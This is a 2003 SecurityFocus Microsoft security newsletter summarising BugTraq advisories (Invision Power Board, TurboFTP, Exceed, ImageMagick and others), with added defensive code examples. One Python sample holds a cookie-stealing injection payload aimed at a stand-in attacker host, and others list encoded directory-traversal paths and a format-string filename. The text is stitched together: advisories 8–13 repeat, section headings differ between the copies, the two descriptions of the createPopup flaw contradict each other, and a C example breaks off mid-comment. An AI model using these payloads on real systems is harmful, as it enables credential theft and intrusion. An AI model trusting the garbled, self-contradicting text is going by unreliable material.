SecurityFocus Microsoft Newsletter #146
---------------------------------------
This Issue is Sponsored by: KaVaDo
Your network Firewall and IDS products do not prevent Web application
exploits - the most common form of online attack - resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without compromising
business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/Kavado-ms-secnews3
-------------------------------------------------------------------------------
I. FRONT AND CENTER
1. Waiting for the Worms
2. Blogs: Another Tool in the Security Pro's Toolkit (Part One)
3. Forensic Log Parsing with Microsoft's LogParser
4. Honeytokens: The Other Honeypot
5. The SecurityFocus 4th Anniversary Contest Winners Announced
6. **ANNOUNCEMENT**
II. MICROSOFT VULNERABILITY SUMMARY
1. Invision Power Board Multiple Vulnerabilities
2. Multiple Trend Micro HouseCall ActiveX Control Remote Buffer...
3. NeoModus Direct Connect Infinite Request Remote Denial Of...
4. Netscape Client Detection Tool Plug-In Buffer Overflow...
5. Microsoft Internet Explorer AutoScan Method Browser...
6. Mabry Software HTTPServer/X File Disclosure Vulnerability
7. PHPForum Mainfile.PHP Remote File Include Vulnerability
8. Twilight WebServer GET Request Buffer Overflow Vulnerability
9. TurboSoft TurboFTP Receive Buffer Overflow Vulnerability
10. ASP-DEV Discussion Forum Admin Directory Weak Default...
11. LookSmart Grub Clear Text Password Local Storage Vulnerability
12. Microsoft Internet Explorer window.createPopup Interface...
13. ImageMagick Display Filename Format String Vulnerability
14. Exceed Font Name Handler Buffer Overflow Vulnerability
15. NetSuite HTTP Server Directory Traversal Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. Internet explorer history viewer (Thread)
2. CA-SSL in IIS (Thread)
3. AW: Internet explorer history viewer (Thread)
4. CIFS Security (Thread)
5. SecurityFocus Microsoft Newsletter #145 (Thread)
6. FW: Keyboard Locking/Invisible Screensaver (Thread)
7. investigating misuse of the internet (Thread)
8. How to generate list of patches installed? (long) (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Primedius Personal Firewall/Anti-Spy ware
2. F-Secure Internet Security 2003
3. Steganos Security Suite 5
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. aNTG v1.0
2. LibTomMath v0.23
3. Darik's Boot and Nuke v1.0.1
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Waiting for the Worms
By Tim Mullen
The hole's been announced, the patch has been released. Now there's
nothing to do but wait for the worm to come and wreak its ugly havoc.
http://www.securityfocus.com/columnists/174
2. Blogs: Another Tool in the Security Pro's Toolkit (Part One)
By Scott Granneman
I'll admit, I love information. No, make that I love and need information.
If you're interested in keeping up with trends and changes in security,
you're probably an information addict as well. You absorb security-related
information and then ponder, examine, and analyze it before reshaping it
in a way that helps protect your data, your systems, and your networks.
http://www.securityfocus.com/columnists/173
3. Forensic Log Parsing with Microsoft's LogParser
By Mark Burnett
The purpose of this article is to demonstrate log file forensics for IIS
using SQL queries with Microsoft's LogParser tool.
http://www.securityfocus.com/infocus/1712
4. Honeytokens: The Other Honeypot
By Lance Spitzner
The purpose of this series of honeypot papers is to cover the breadth of
honeypot technologies, values and issues. This article extends the
capabilities even further by discussing the concept of honeytokens.
http://www.securityfocus.com/infocus/1713
5. The SecurityFocus 4th Anniversary Contest Winners Announced
With the contest having ended this past Wednesday, July 16, 2003, and with a
large volume of entries, we have chosen the winners. The two entrants who
came closest to choosing the correct date of Sept. 22, 2002, 7:11 am MST
have won a pair of tickets to the Black Hat Briefings in Las Vegas, NV,
USA. Congratulations to Jenny H. of San Antonio, TX, and Leah E. of
Tucson, AZ, for their winning entries.
6. **ANNOUNCEMENT**
SecurityFocus will now be masking email addresses contained within all our
mailing lists to ensure that they can no longer be harvested. We have
taken these steps with your privacy being our main concern.
II. BUGTRAQ SUMMARY
-------------------
1. Invision Power Board Multiple Vulnerabilities
BugTraq ID: 8165
Remote: Yes
Date Published: Jul 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8165
Summary:
Invision Board is web forum software. It is implemented in PHP and is
available for Unix and Linux variants and Microsoft Windows operating
systems.
It has been reported that Invision Power Board fails to sufficiently
sanitize user input in multiple places, resulting in a number of
exploitable vulnerabilities. Both SQL injection and HTML injection
attacks are possible.
HTML and script code are not filtered from within [FLASH][/FLASH] tags,
allowing for injection of hostile client-side script code into areas of
the bulletin board that allow these tags to be included. Exploitation
could result in theft of cookie-based authentication credentials from
other users. It will also be possible to control how the site is rendered
to other users. Other attacks are also possible.
The 'ipchat.php' does not filter SQL syntax supplied via URI parameters
before including it in database queries, allowing for SQL injection
attacks. This could be exploited to manipulate database queries,
potentially resulting in compromise of the bulletin board, information
disclosure or database corruption. SQL injection attacks may also allow
attackers to exploit latent vulnerabilities present in the underlying
database implementation.
This BID will be separated into multiple BIDs when analysis of these
issues is complete.
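The [FLASH] tag problem described above, as an added example that is not Invision Power Board's code: a hypothetical BBCode renderer in Python, first in the vulnerable form (the tag body is copied into the markup unchanged) and then in a hardened form that validates the URL and escapes it for the attribute context. The post bodies, the example.test and attacker.test hosts and every function name are constructed for this example.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample posts (not real Invision Power Board data). The second
# one closes the src attribute with a double quote and smuggles an event
# handler that ships the viewer's cookie to a hypothetical attacker host.
BENIGN_POST = "Check this out: [FLASH]http://example.test/clip.swf[/FLASH]"
HOSTILE_POST = (
    '[FLASH]x.swf" onload="document.location='
    "'http://attacker.test/?c='+document.cookie"
    '"[/FLASH]'
)

FLASH_TAG = re.compile(r"\[FLASH\](.*?)\[/FLASH\]", re.IGNORECASE | re.DOTALL)
EMBED = '<embed src="{src}" type="application/x-shockwave-flash">'


def render_flash_vulnerable(post: str) -> str:
    """Vulnerable pattern: the tag body is dropped straight into the markup.

    The board trusts that whatever sits between [FLASH] and [/FLASH] is a
    URL, so a quote in the body ends the src attribute and everything after
    it becomes attacker-controlled HTML in every viewer's browser."""
    return FLASH_TAG.sub(lambda m: EMBED.format(src=m.group(1)), post)


def is_safe_flash_url(candidate: str) -> bool:
    """Accept only absolute http(s) URLs whose path ends in .swf.

    The scheme check also rules out javascript: and data: URLs, which would
    otherwise reach the src attribute as perfectly well-formed values."""
    parts = urlsplit(candidate.strip())
    return (parts.scheme in ("http", "https")
            and bool(parts.netloc)
            and parts.path.lower().endswith(".swf"))


def render_flash_hardened(post: str) -> str:
    """Hardened form: validate first, then escape for the attribute context.

    A body that fails validation is shown as escaped text, never as markup,
    so the worst an attacker achieves is an ugly post."""
    def replace(match: re.Match) -> str:
        body = match.group(1)
        if not is_safe_flash_url(body):
            return html.escape(body, quote=True)
        return EMBED.format(src=html.escape(body, quote=True))
    return FLASH_TAG.sub(replace, post)


def has_injected_handler(markup: str) -> bool:
    """Spot check used to compare the two renderers: a live onload= attribute
    in the output means the tag body escaped the src attribute."""
    return ' onload="' in markup
```

Run the hostile post through both renderers: the vulnerable one emits a live `onload=` handler, the hardened one emits the same text with its quotes turned into `&quot;`, which no browser will treat as an attribute boundary. The benign post renders identically under both, which is the property a filter change has to preserve.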
2. Multiple Trend Micro HouseCall ActiveX Control Remote Buffer Overflow Vulnerabilities
BugTraq ID: 8170
Remote: Yes
Date Published: Jul 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8170
Summary:
HouseCall is the online virus scanning service of Trend Micro. It is
available for the Microsoft Windows platform.
It has been reported that multiple buffer overflow vulnerabilities exist
in Trend Micro HouseCall. Because of this, an attacker may be able to
create a denial of service, or potentially gain elevated privileges on a
system with the vulnerable control installed.
Specific details about the overflows are not currently available. What is
known about them is that, when exploited, it is possible for an attacker
to execute arbitrary instructions through the browser of the vulnerable
user. Any code executed through this vulnerability would be with the
privileges of the browser user.
3. NeoModus Direct Connect Infinite Request Remote Denial Of Service Vulnerability
BugTraq ID: 8178
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8178
Summary:
Direct Connect is a freely available file sharing client distributed by
NeoModus. It is available for the Microsoft Windows and Linux platforms.
It has been reported that NeoModus Direct Connect does not sufficiently
limit requests. Because of this, an attacker could potentially deny
service to a legitimate user of the client.
The problem is in the limiting of connection requests by Direct Connect
hubs. It is possible for a user to send an unbounded number of connection
requests from one client to another through a hub. This could exhaust
network and system resources on the target client, making the target host
unusable.
4. Netscape Client Detection Tool Plug-In Buffer Overflow Vulnerability
BugTraq ID: 8180
Remote: No
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8180
Summary:
The Client Detection Tool plug-in is a component of the Netscape browser.
It is maintained and distributed by Netscape, and available for the
Microsoft Windows, Unix, and Linux platforms.
It has been reported that the Client Detection Tool plug-in is vulnerable
to a buffer overflow when handling some types of files. This may result
in the execution of arbitrary code with the privileges of the browser
user.
The problem is in the handling of specially crafted files of the x-cdt
MIME type. A buffer overflow occurs when the CDT plug-in attempts to
handle an argument longer than 256 bytes. When a file name and the path
to a user's temporary directory total more than 256 bytes, it is possible
to execute code contained in the file name.
Some limitations exist in this vulnerability. For example, some operating
systems such as Microsoft Windows Server 2003 limit attachment name size
to 218 bytes. Additionally, the file name cannot contain non-ASCII
characters.
5. Microsoft Internet Explorer AutoScan Method Browser Security Policy Violation Weakness
BugTraq ID: 8169
Remote: Yes
Date Published: Jul 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8169
Summary:
A weakness has been reported in Microsoft Internet Explorer in the way the
AutoScan method is implemented. This weakness may result in the violation
of the browser security policy.
It is known that through the AutoScan method, it is possible to cause one
browser window to navigate to a different site through another. This
issue may not be limited to this specific method, and may aid in the
exploitation of other browser bugs to gain elevated privileges or
unauthorized access.
6. Mabry Software HTTPServer/X File Disclosure Vulnerability
BugTraq ID: 8166
Remote: Yes
Date Published: Jul 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8166
Summary:
Mabry Software HTTPServer/X is a web server implemented as an ActiveX
Control and COM Object. It is available for Microsoft Windows operating
systems.
HTTPServer/X does not sufficiently sanitize directory traversal sequences
from web requests. This could allow remote users to request files outside
of the document root of the web server. Remote attackers could exploit
this issue to gain access to sensitive files on a system hosting the web
server implementation. Any files that are readable by the web server
would be exposed. The web server is reported to run with system level
privileges.
Successful exploitation may permit attackers to gain access to files
containing sensitive information, facilitating further attempts to
compromise the system.
7. PHPForum Mainfile.PHP Remote File Include Vulnerability
BugTraq ID: 8158
Remote: Yes
Date Published: Jul 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8158
Summary:
phpForum is web forum software. It is available for Unix/Linux variants
and Microsoft Windows operating systems.
phpForum is prone to a vulnerability that may permit remote attackers to
include and execute malicious PHP scripts. Under some PHP configurations
(typically with register_globals enabled), remote users may set the
$MAIN_PATH variable through the request. This variable is used in the
include path for the 'config.php' script in 'mainfile.php'. By pointing
the include path at a malicious PHP script on a remote system, an attacker
can cause arbitrary PHP code to be executed in the context of the web
server process.
8. Twilight WebServer GET Request Buffer Overflow Vulnerability
BugTraq ID: 8181
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8181
Summary:
Twilight WebServer is an HTTP server designed for Microsoft Windows
platforms.
It has been reported that Twilight WebServer may be remotely exploitable,
due to a buffer overflow present in the function responsible for handling
HTTP GET requests. If an attacker sends a string exceeding a specific
length, it may be possible to crash the web server. If an attacker were to
corrupt sensitive data residing in adjacent memory locations, it may be
possible to execute arbitrary code.
9. TurboSoft TurboFTP Receive Buffer Overflow Vulnerability
TurboFTP is an FTP client that is designed for Microsoft Windows operating
systems.
TurboFTP has been reported prone to a buffer overrun vulnerability.
The issue likely presents itself due to a lack of sufficient bounds
checking performed on data that is later copied into a reserved internal
memory buffer. If an FTP server sends a response to the client exceeding
approximately 1 kilobyte, a buffer may be overrun and it may be possible
to corrupt adjacent memory. Because the data is converted into Unicode
prior to being copied, conventional stack-based buffer overflow attacks
may not be successful. It is not known whether arbitrary code execution is
possible.
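To make the Unicode remark concrete, an added Python model (not TurboFTP's code, whose internals the report does not disclose) of the widening step: a constructed FTP response is converted to UTF-16LE the way the report says the client does, and the helpers show how much earlier the buffer overflows and which 32-bit values the widened copy can place in memory. The 1024-byte buffer size, the Latin-1 source character set and the response itself are assumptions made for the example.

```python
# Constructed FTP server response (not a captured TurboFTP session): a long
# banner line of the kind a hostile server could return to a client.
FAKE_RESPONSE = b"220-" + b"A" * 700 + b"\r\n"
BUFFER_SIZE = 1024   # assumed size of the client's internal buffer


def widen_to_utf16le(data: bytes) -> bytes:
    """Model the client's conversion step: every single-byte character of the
    response becomes a two-byte UTF-16LE code unit. Latin-1 is assumed for
    the server's character set, so each byte b becomes (b, 0x00)."""
    return data.decode("latin-1").encode("utf-16-le")


def overflow_bytes(response: bytes, buffer_size: int = BUFFER_SIZE) -> int:
    """Bytes that spill past the buffer after widening. The response only
    has to be about half the buffer size to overflow it."""
    return max(0, len(widen_to_utf16le(response)) - buffer_size)


def overwrite_value(response: bytes, slot_offset: int) -> int:
    """The 32-bit little-endian value the widened copy writes at slot_offset
    (for example the location of a saved return address)."""
    widened = widen_to_utf16le(response)
    return int.from_bytes(widened[slot_offset:slot_offset + 4], "little")


def address_writable_after_widening(addr: int) -> bool:
    """Whether a 32-bit value can be produced by the widened copy at an even
    offset from the start of the buffer: its bytes are b0 00 b1 00, so only
    values of the form 0x00b100b0 are reachable (an odd offset gives the
    shape 0xb200b100 instead). That is why the report notes that a
    conventional return-address overwrite may not succeed."""
    b = addr.to_bytes(4, "little")
    return b[1] == 0 and b[3] == 0
```

The practical consequence for a defender is that the reported "approximately 1 kilobyte" is measured after widening, so the raw response needed is nearer 512 bytes; for an attacker, every other byte of anything they write is forced to zero, which rules out most return addresses and is the reason the report stops short of claiming code execution.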
10. ASP-DEV Discussion Forum Admin Directory Weak Default...
Discussion Forum is a freely available, open source message board
distributed by ASP-DEV. It is available for the Microsoft Windows
platform.
It has been reported that a vulnerability exists in ASP-DEV Discussion
Forum that exposes potentially sensitive information. Because of this, an
attacker may be able to gain access to user credentials.
The problem is in the permissions set on the admin directory. Sensitive
information is stored in this directory, including usernames, passwords,
and other data. This information also includes the administrative account
information, which may yield administrative privileges to the attacker.
11. LookSmart Grub Clear Text Password Local Storage Vulnerability
BugTraq ID: 8175
Remote: No
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8175
Summary:
Grub is a freely available link indexing client for the Grub project. It
is available for the Microsoft Windows platform.
It has been reported that Grub does not sufficiently secure sensitive
information. Because of this, an attacker may be able to gain
unauthorized access to Grub user credentials.
The problem is in the storage of username and password information. This
information is stored in the system registry in the key
HKEY_CURRENT_USER\Software\VB and VBA Program
Settings\GrubClient\Settings. Data stored in this key is in plain text,
and can be retrieved by any user with read permissions of the registry
key.
12. Microsoft Internet Explorer window.createPopup Interface Spoofing Vulnerability
BugTraq ID: 8176
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8176
Summary:
Microsoft Internet Explorer may permit aspects of the Windows interface to
be spoofed. This could facilitate a number of attacks against users of the
browser, including spoofing the address bar of a web page or obscuring
warning dialogs. Users may be apt to trust the spoofed content.
This issue is due to the window.createPopup() function creating
'chromeless' windows: windows with no title bar, border or browser
controls, which can be positioned anywhere on the screen, including over
the browser's own interface elements. Other functions, such as
showModalDialog() and showModelessDialog(), do not create chromeless
windows when invoked.
Windows created via window.createPopup() do have a few characteristics
that may impede some types of attacks: the window cannot take focus, and
it closes when the user clicks outside of it.
13. ImageMagick Display Filename Format String Vulnerability
ImageMagick is an image manipulation program. It is available for a
variety of platforms including Microsoft Windows and Unix and Linux
variant operating systems.
The ImageMagick display program is alleged to be prone to a format string
vulnerability. Exploitation may occur when the program is invoked with a
filename that includes malicious format specifiers. This issue could be
exploited to corrupt arbitrary regions of memory with attacker-supplied
data, potentially resulting in execution of arbitrary code in the context
of the user running the program.
For this issue to be exploited, the program would need to be invoked with
an untrusted filename. This could occur automatically if the program was
specified as the default image viewer for an e-mail client or some other
program.
This issue was reported for Unix/Linux platforms. It is not known if
other platforms are similarly affected.
14. Exceed Font Name Handler Buffer Overflow Vulnerability
BugTraq ID: 8194
Remote: Yes
Date Published: Jul 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8194
Summary:
The Exceed X server is an X Window System server for Microsoft Windows
systems. The server listens for connections on TCP port 6000. Exceed client
software is then used to connect to the Exceed X server.
The Exceed server and client have been reported prone to a remotely
triggered buffer overflow vulnerability. An attacker may trigger this
vulnerability by sending >=6001 bytes of data as a font name to the server
via an XLoadQueryFont() request, or by passing a malicious font name from
the server to the client in a manner sufficient to trigger the overflow.
When the vulnerable software handles this request it will crash.
The issue is likely due to a lack of sufficient bounds checking performed
on font name data before it is copied into a reserved memory buffer. If
the supplied data exceeds the size of the reserved buffer, excessive data
may overrun the bounds of the buffer and corrupt adjacent memory space. In
this instance, it has been reported that adjacent memory contains a saved
instruction pointer. Because the attacker has the ability to influence
program execution flow, it may be possible to supply and execute arbitrary
code. This however has not been confirmed.
It has been demonstrated that this vulnerability may be exploited to
trigger a denial of service condition; code execution, although
unconfirmed, may also be possible.
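An added detection example for the trigger described above, not Exceed's code: a small Python parser that walks core X11 requests and flags OpenFont requests (the request Xlib's XLoadQueryFont() sends to the server) whose font name exceeds 6000 bytes. The sample stream is constructed here; little-endian client byte order, a stream that starts at a request boundary after connection setup, and the absence of BIG-REQUESTS extended lengths are assumptions of the example.

```python
import struct

OPENFONT_OPCODE = 45
FONT_NAME_LIMIT = 6000   # the report puts the crash threshold at >= 6001 bytes


def build_open_font(fid: int, name: bytes) -> bytes:
    """Encode a core-protocol OpenFont request (client byte order assumed
    little-endian). Used here only to construct sample traffic."""
    n = len(name)
    pad = (-n) % 4
    length_units = 3 + (n + pad) // 4       # 12-byte header + padded name
    header = struct.pack("<BBHIHxx", OPENFONT_OPCODE, 0, length_units, fid, n)
    return header + name + b"\x00" * pad


def iter_requests(stream: bytes):
    """Yield (opcode, request_bytes) for each request in a post-setup stream.
    A zero length field means a BIG-REQUESTS extended request, which this
    example does not handle, so the walk stops there."""
    offset = 0
    while offset + 4 <= len(stream):
        opcode, _, units = struct.unpack_from("<BBH", stream, offset)
        if units == 0:
            break
        size = units * 4
        yield opcode, stream[offset:offset + size]
        offset += size


def font_name(request: bytes) -> bytes:
    """Font name carried by an OpenFont request (2-byte length at offset 8,
    name starting at offset 12)."""
    (n,) = struct.unpack_from("<H", request, 8)
    return request[12:12 + n]


def oversized_font_names(stream: bytes, limit: int = FONT_NAME_LIMIT) -> list:
    """Lengths of OpenFont names longer than limit, in stream order. A hit
    against an Exceed server is worth an alert before the crash shows up."""
    hits = []
    for opcode, request in iter_requests(stream):
        if opcode == OPENFONT_OPCODE and len(request) >= 12:
            n = len(font_name(request))
            if n > limit:
                hits.append(n)
    return hits


# Constructed sample stream: one ordinary font open followed by the
# oversized name the report describes.
SAMPLE_STREAM = (
    build_open_font(0x0200001, b"-misc-fixed-medium-r-normal--13-120-75-75-c-70-iso8859-1")
    + build_open_font(0x0200002, b"A" * 6001)
)
```

Because the X request length field is 16 bits in units of four bytes, a 6001-byte font name fits comfortably inside a single core request, so nothing about the framing itself looks abnormal; only the name length does, which is why a detector has to parse the OpenFont body rather than just the header.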
15. NetSuite HTTP Server Directory Traversal Vulnerability
NetSuite is a simple SMTP and HTTP/CGI server for Microsoft Windows based
systems.
The HTTP component of NetSuite has been reported prone to a directory
traversal vulnerability.
Various combinations of encoded directory traversal sequences may be used
to break out of the web root directory. Attackers may gain access to files
that are readable by the web server as a result.
Successful exploitation may expose sensitive information to remote
attackers. This information could be used to aid in further attacks that
attempt to compromise the host.
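Both the HTTPServer/X report above and this NetSuite report, with its "various combinations of encoded directory traversal sequences", come down to the same check being done on the wrong string. As an added example (not code from either product), the Python below shows a naive check that inspects the raw request and lets every encoded variant through, beside a resolver that percent-decodes to a fixed point, folds backslashes, and walks the path's segments against a document root before deciding. The request paths, the document root and the function names are constructed for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

DOCROOT = "/srv/www/htdocs"   # hypothetical document root

# Constructed request paths: two legitimate ones, then the kinds of encoded
# traversal sequences the HTTPServer/X and NetSuite reports describe.
SAMPLE_REQUESTS = [
    "/index.html",
    "/images/../index.html",
    "/../../../boot.ini",
    "/..%2f..%2f..%2fboot.ini",
    "/%2e%2e/%2e%2e/%2e%2e/boot.ini",
    "/..%255c..%255c..%255cboot.ini",      # double-encoded backslash
    "/..\\..\\..\\boot.ini",
    "/scripts/%c0%ae%c0%ae/boot.ini",      # overlong UTF-8 dots
]


def naive_allows(raw_path: str) -> bool:
    """The check that fails: look for a literal ../ in the raw request.
    Every encoded variant above sails through it."""
    return "../" not in raw_path


def canonical_decode(raw_path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), then fold
    backslashes to forward slashes. Undecodable byte sequences such as
    overlong UTF-8 come back as U+FFFD rather than as dots."""
    decoded = raw_path
    for _ in range(max_rounds):
        step = unquote(decoded, errors="replace")
        if step == decoded:
            break
        decoded = step
    return decoded.replace("\\", "/")


def resolve_request_path(docroot: str, raw_path: str) -> Optional[str]:
    """Map a request path onto the document root, or return None if it
    would escape. The decision is made on the fully decoded path by
    walking its segments, so ".." can never climb above the root."""
    decoded = canonical_decode(raw_path)
    if "\x00" in decoded or "\ufffd" in decoded:
        return None                        # NUL truncation or bad encoding
    parts = []
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not parts:
                return None                # attempt to leave the web root
            parts.pop()
            continue
        parts.append(segment)
    return posixpath.join(docroot, *parts)


def classify(requests) -> dict:
    """Resolve each sample request; None marks a rejected traversal."""
    return {raw: resolve_request_path(DOCROOT, raw) for raw in requests}
```

Rejecting rather than silently clamping an escape attempt is deliberate: a request that tries to climb above the root is worth a log line, and a resolver that quietly serves /index.html for /../../../boot.ini hides the probe from whoever reads the logs.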
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Internet explorer history viewer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329280
2. CA-SSL in IIS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329281
3. AW: Internet explorer history viewer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329276
4. CIFS Security (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329101
5. SecurityFocus Microsoft Newsletter #145 (Thread)
Relevant URL:
7. investigating misuse of the internet (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328725
8. How to generate list of patches installed? (long) (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328724
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Primedius Personal Firewall/Anti-Spy ware
by Primedius
Platforms: Windows 2000, Windows XP
Relevant URL:
http://www.primedius.com/PersonalFirewall.htm
Summary:
Primedius Personal Firewall/Anti-Spy ware prevents intrusions and stops
unwanted entries to, and communications from, your computer. It also
detects, reviews and screens any entry through the Winsock layer.
2. F-Secure Internet Security 2003
by F-Secure Corporation
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.f-secure.com/estore/fsis2003.shtml
Summary:
F-Secure Internet Security 2003 includes an award winning antivirus
software, as well as an easy-to-use personal firewall product that
protects your system against break-in attempts when you are connected to
the Internet.
3. Steganos Security Suite 5
by Steganos
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.steganos.com/en/sss/index.htm
Summary:
A complete, easy-to-use security package that encrypts and conceals your
data. The Steganos Safe is a secure hard drive, which disappears at the
click of a button. Thanks to on-the-fly-encryption, 1 GB of data can be
encrypted in less than a second. Create encrypted e-mail attachments.
Includes Internet Trace Destructor, file shredder, e-mail encryption,
password manager and computer locking.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
-------------------------------------
1. aNTG v1.0
by Lucas
Relevant URL:
http://www.thebobo.com/antg.php
Platforms: UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
aNTG (another Network Traffic Grapher) is a PHP program that collects and
graphs network traffic statistics on a Linux machine.
2. LibTomMath v0.23
by Tom St Denis tomstdenis (at) iahu (dot) ca [email concealed]
Relevant URL:
http://math.libtomcrypt.org/
Platforms: Linux, UNIX, Windows 2000, Windows 95/98, Windows NT, Windows
XP
Summary:
LibTomMath provides highly optimized and portable routines for a vast
majority of integer-based number theoretic applications (including public
key cryptography).
3. Darik's Boot and Nuke v1.0.1
by Darik Horn
Relevant URL:
http://dban.sourceforge.net/
Platforms: Os Independent
Summary:
Darik's Boot and Nuke (DBAN) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and
completely delete the contents of any hard disk that it can detect, which
makes it an appropriate utility for bulk or emergency data destruction.
VI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: KaVaDo
Your network Firewall and IDS products do not prevent Web application
exploits - the most common form of online attack - resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without compromising
business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/Kavado-ms-secnews3
-------------------------------------------------------------------------------
HTTP GET requests. If an attacker sends a string exceeding a specific
length, it may be possible to crash the web server. If an attacker were to
corrupt sensitive data residing in adjacent memory locations, it may be
possible to execute arbitrary code.
9. TurboSoft TurboFTP Receive Buffer Overflow Vulnerability
BugTraq ID: 8163
Remote: Yes
Date Published: Jul 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8163
Summary:
TurboFTP is an FTP client that is designed for Microsoft Windows operating
systems.
TurboFTP has been reported prone to a buffer overrun vulnerability.
The issue likely presents itself due to a lack of sufficient bounds
checking performed on data that is later copied into a reserved internal
memory buffer. If an FTP server sends a response to the client exceeding
approximately 1 kilobyte, a buffer may be overrun and it may be possible
to corrupt adjacent memory. Because the data is converted into Unicode
prior to being copied, conventional stack-based buffer overflow attacks
may not be successful. It is not known whether arbitrary code execution is
possible.
10. ASP-DEV Discussion Forum Admin Directory Weak Default Permissions Vulnerability
BugTraq ID: 8172
Remote: Yes
Date Published: Jul 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8172
Summary:
Discussion Forum is a freely available, open source message board
distributed by ASP-DEV. It is available for the Microsoft Windows
platform.
It has been reported that a vulnerability exists in ASP-DEV Discussion
Forum that exposes potentially sensitive information. Because of this, an
attacker may be able to gain access to user credentials.
The problem is in the permissions set on the admin directory. Sensitive
information is stored in this directory, including usernames, passwords,
and other data. This information also includes the administrative account
information, which may yield administrative privileges to the attacker.
11. LookSmart Grub Clear Text Password Local Storage Vulnerability
BugTraq ID: 8175
Remote: No
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8175
Summary:
Grub is a freely available link indexing client for the Grub project. It
is available for the Microsoft Windows platform.
It has been reported that Grub does not sufficiently secure sensitive
information. Because of this, an attacker may be able to gain
unauthorized access to Grub user credentials.
The problem is in the storage of username and password information. This
information is stored in the system registry in the key
HKEY_CURRENT_USER\Software\VB and VBA Program
Settings\GrubClient\Settings. Data stored in this key is in plain text,
and can be retrieved by any user with read permissions of the registry
key.
12. Microsoft Internet Explorer window.createPopup Interface Spoofing Vulnerability
BugTraq ID: 8176
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8176
Summary:
Microsoft Internet Explorer may permit aspects of the Windows interface to
be spoofed. This could facilitate a number of attacks against users of the
browser, including spoofing address bars for web pages or obscuring
warning dialogs. Users may be apt to trust the spoofed content.
This issue is due to the window.createPopup() function not using
'chromeless' windows. Other functions, such as createModalDialog() and
createModelessDialog(), will create 'chromeless' windows when invoked.
Windows created via window.createPopup() will have a few characteristics
that may impede some types of attacks, such as the inability to focus the
window and also that the window will close when the user clicks outside of
it.
13. ImageMagick Display Filename Format String Vulnerability
BugTraq ID: 8177
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8177
Summary:
ImageMagick is an image manipulation program. It is available for a
variety of platforms including Microsoft Windows and Unix and Linux
variant operating systems.
The ImageMagick display program is alleged to be prone to a format string
vulnerability. Exploitation may occur when the program is invoked with a
filename that includes malicious format specifiers. This issue could be
exploited to corrupt arbitrary regions of memory with attacker-supplied
data, potentially resulting in execution of arbitrary code in the context
of the user running the program.
For this issue to be exploited, the program would need to be invoked with
an untrusted filename. This could occur automatically if the program was
specified as the default image viewer for an e-mail client or some other
program.
This issue was reported for Unix/Linux platforms. It is not known if
other platforms are similarly affected.
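The defect class in the ImageMagick entry above is a filename reaching a printf-family call as the format argument rather than as data. The following C block is an added example and is not ImageMagick's code or the advisory's own material: it shows the hardened call (a literal format with the name passed through `%s`), a helper that doubles `%` for the rare case where a name must be spliced into a run-time template, and a triage check a mail client or wrapper could apply before handing a name to an external viewer. The function names, the global scratch buffers and the sample filename are all constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Scratch buffers for the demo (hypothetical; a real program uses its own). */
char g_msg[256];
char g_escaped[256];

/*
 * The defect the advisory describes looks like this (comment only, never run):
 *
 *     fprintf(stderr, filename);      // filename used AS the format string
 *
 * A name such as "photo%x%x%n.png" is then parsed by printf itself: the
 * conversions read and, with %n, write memory, which is where the memory
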